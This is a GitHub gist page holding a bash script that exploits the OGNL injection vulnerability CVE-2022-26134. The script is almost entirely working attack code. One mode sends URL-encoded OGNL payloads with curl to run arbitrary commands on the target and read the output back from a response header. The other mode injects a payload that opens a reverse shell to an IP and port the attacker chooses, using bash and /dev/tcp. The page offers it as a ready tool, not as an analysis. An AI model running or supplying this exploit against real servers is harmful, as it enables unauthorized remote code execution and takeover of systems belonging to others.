Created
May 18, 2023 16:29
-
-
Save enciphers-team/60a35472fd7f5c44063a1eadf458bb1e to your computer and use it in GitHub Desktop.
A shell script developed to exploit the OGNL injection vulnerability (CVE-2022-26134). It simplifies the exploitation process and provides a convenient method for executing commands and establishing a reverse shell connection. The script supports single-word commands and allows the user to specify an IP address and port for the reverse shell con…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| URL="" | |
| COMMAND="" | |
| IP="" | |
| PORT="" | |
| while getopts "u:c:i:p:h" opt; do | |
| case ${opt} in | |
| u ) | |
| URL=$OPTARG | |
| ;; | |
| c ) | |
| COMMAND=$OPTARG | |
| ;; | |
| i ) | |
| IP=$OPTARG | |
| ;; | |
| p ) | |
| PORT=$OPTARG | |
| ;; | |
| h ) | |
| echo "Usage: $0 -u <URL> [-c <Command>] [-i <IP>] [-p <Port>]" | |
| exit 0 | |
| ;; | |
| \? ) | |
| echo "Invalid option: $OPTARG" 1>&2 | |
| exit 1 | |
| ;; | |
| : ) | |
| echo "Invalid option: $OPTARG requires an argument" 1>&2 | |
| exit 1 | |
| ;; | |
| esac | |
| done | |
| if [[ -z $URL ]]; then | |
| echo "Missing required argument(s)." | |
| echo "Usage: $0 -u <URL> [-c <Command>] [-i <IP>] [-p <Port>]" | |
| exit 1 | |
| fi | |
| if [[ -n $COMMAND ]] && ([[ -n $IP ]] || [[ -n $PORT ]]); then | |
| echo "Error: -c option cannot be combined with -i or -p options." | |
| echo "Usage: $0 -u <URL> [-c <Command>] [-i <IP>] [-p <Port>]" | |
| exit 1 | |
| fi | |
| if [[ -n $COMMAND ]]; then | |
| response=$(curl -s -I "$URL/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22$COMMAND%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" | grep -i '^X-Cmd-Response:' | cut -d ':' -f2- | sed 's/^ *//') | |
| echo "Response: $response" | |
| else | |
| if [[ -z $IP ]] || [[ -z $PORT ]]; then | |
| echo "Error: Missing required argument(s) for reverse shell connection." | |
| echo "Usage: $0 -u <URL> [-c <Command>] [-i <IP>] [-p <Port>]" | |
| exit 1 | |
| fi | |
| curl "$URL/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/$IP/$PORT%200%3E%261%27%29.start%28%29%22%29%7D/" -v | |
| echo "I Hope You got a shell!" | |
| fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment